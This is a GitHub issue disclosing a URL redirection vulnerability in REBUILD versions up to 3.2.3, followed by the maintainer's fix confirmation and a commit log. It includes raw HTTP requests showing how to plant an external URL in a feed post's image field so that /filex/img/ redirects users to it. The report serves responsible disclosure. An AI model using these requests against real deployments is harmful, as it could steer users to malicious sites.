Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system #596

Closed
Mechoy opened this issue Mar 19, 2023 · 2 comments

Comments

@Mechoy
Copy link

Mechoy commented Mar 19, 2023

版本 / Version

<=3.2.3

什么问题 / What's the problem

A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system.
在REBUILD系统的/filex/img/**接口中存在URL重定向漏洞

如何复现此问题 / How to reproduce this problem

功能点 / Function points

urlRedirection1_3
Create a new dynamic in the dynamic function (need to insert an image), click Publish, obtain the request information from the /feeds/post/publish interface, and change the content in images.
在动态功能处创建新的动态(需插入图片),点击发布,获取/feeds/post/publish接口的请求信息,更改images处的内容。

POST /feeds/post/publish HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 112
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close

{"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}}

urlRedirection1_4
View the front-end page and discover that http://www.baidu.com Has been successfully joined.
查看前端页面,发现http://www.baidu.com已被成功加入。

GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1
Host: 192.168.0.102:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close

urlRedirection1_5
Click Download File to successfully redirect tohttp://www.baidu.com
点击下载文件,能够成功跳转至http://www.baidu.com
urlRedirection1_7

系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)

Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome

说明 / Suggested description

URL Redirection vulnerability exists in rebuild <=3.2.3
rebuild系统中存在URL重定向漏洞<=3.2.3

漏洞类型 / Vulnerability Type

URL Redirection

产品供应商 / Vendor of Product

https://github.com/getrebuild/rebuild

受影响的产品代码库 / Affected Product Code Base

<=3.2.3

受影响组件 / Affected Component

/feeds/post/publish
/filex/img/**

攻击方式 / Attack Type

Remote

漏洞成因 / Cause of vulnerability

In the com.build.web.commons.FileDownloader#viewImg() method, obtain the path of the image and obtain it based on the path of the image,Then redirect based on the obtained content.
在com.rebuild.web.commons.FileDownloader#viewImg()方法中,对图片的路径进行获取,根据图片的路径进行获取,然后根据获取到的内容进行重定向。
urlRedirection1_1
The path of the image is passed in by the com.rebuild.web.feeds.FeedsPostController#publish method
图片的路径由com.rebuild.web.feeds.FeedsPostController#publish方法传入
urlRedirection1_2
An attacker can implement a URL redirection vulnerability when a user clicks to download a file by changing the image path information to a malicious website address.
攻击者能够通过将图片路径信息更改为恶意网站地址,在用户点击下载文件时实现URL重定向漏洞。
The end,thanks!

@getrebuild
Copy link
Owner

感谢反馈,我们将尽快修复!

devezhao pushed a commit that referenced this issue Mar 20, 2023
getrebuild added a commit that referenced this issue Mar 21, 2023
* fix: `trigger/exec-manual` async

* fix: lang

* fix: #596
@getrebuild
Copy link
Owner

We are fixed, Thanks for report.

getrebuild added a commit that referenced this issue May 5, 2023
* Enh charts (#575)

* NN

* feat: LINE/BAR 2dim and dateContinuous

---------

Co-authored-by: RB <getrebuild@sina.com>

* Copy role (#576)

* feat: showAllUsers

* feat: role copy

* bg-guide

---------

Co-authored-by: RB <getrebuild@sina.com>

* base support (#579)

* Excel pdf (#581)

* Bump lib

* excel to pdf

* PdfConverter


---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Files access (#582)


* code style

* se:conf

* feat: folder rights

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Showfields spec (#584)

* field CLASSIFICATION dv

* feat: SYS for DataList

* 视图>详情

* Trigger async (#585)

* 同步发送

* Update @rbv

---------

Co-authored-by: RB <getrebuild@sina.com>

* N2n aggregation (#587)

* 列表视图

* bump

* better delete


* Update @rbv

* star userid

* fieldVarsN2NPath

* USER_OWNS No warn

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Single field after reload (#589)

* v3.3 compact

* singleField reload

* .col-right-compact


---------

Co-authored-by: RB <getrebuild@sina.com>

* List styles (#590)

* quick-filter-pane v3

* dock page

* better

* H5 sync (#593)

* Update submail.html

* better files

* Update @rbv

* H5 sync2 (#595)

* style: 目录样式gh

* style: J_new

* feat: advListFilterTabs

* feat: nav-copyto

* enh: 助记码全拼

* enh: 地图搜索选点

* enh: topnav

* list pn

* .form-line.v33

* open TAG

* KVS addShutdownHook

* fix: #594

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Fix long request (#599)

* fix: `trigger/exec-manual` async

* fix: lang

* fix: #596

* open: detailsNotEmpty (#600)

* open: detailsNotEmpty

* enh: template preview

* protable tipping

* be: form-design

* be: file upload noname

* style: better

* be: NTEXT \n

---------

Co-authored-by: RB <getrebuild@sina.com>

* List topnav (#601)

* setHidden

* enh: THROTTLED_QUEUE

* enh: PageTokenVerify 2h

* fix: Mix N2N & styles

* feat: 表单回填源字段支持二级

* be: showStartGuide

* fix: spec label

* fix: 图表刻度

* fix: file copy

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Trigger fa n2n (#602)

* style

* Update entities-sheet.html

* be: N2N in FieldWriteback

* feat: fa 目标字段支持 N2N NTEXT

* Update trigger.FIELDAGGREGATION.js

* be

* Update LogFunction.java

* be: save tips

* transform-design

* be: meta-name trim

* enh: show import speed

* Project view (#603)

* relaxed-path-chars

* be: style

* feat: LiteForm, setNullable, setTip

* be: forms include

* Update @rbv

* style: 断行

* enh: customized

* style: dialog footer

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Excel use refs (#605)

* template v33

* be: schema timeout

* DataList renderAfter

* enh: whenUpdateFields

* be: RbAlter hide force

* Update @rbv

* fix: useValueOfVarRecord

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* import for users (#608)

* fix: template v33

* feat: clearFields

* be: login btn

* enh: 直接打印

* fix: textCommon overflow

* be: J_decimalTypeFlag

* be: styles & ID

* AssertFailedException

* be: aviator func

* FieldWritebackRefresh

* SSS

* be: RecordBuilder

* classification-editor

* Update ClassificationFileImporter.java

* be: target record DELETED

* Update BarCodeSupport.java

* feat: N selected

* imports for users

* be: barcode w/h

* Update DataImportController.java

* be: TopNav

* open: textCommon

* feat: EnableBizzPart

* text $separator

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Better v3.3 (#610)

* be: style

* 3.3.0-beta1

* be

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants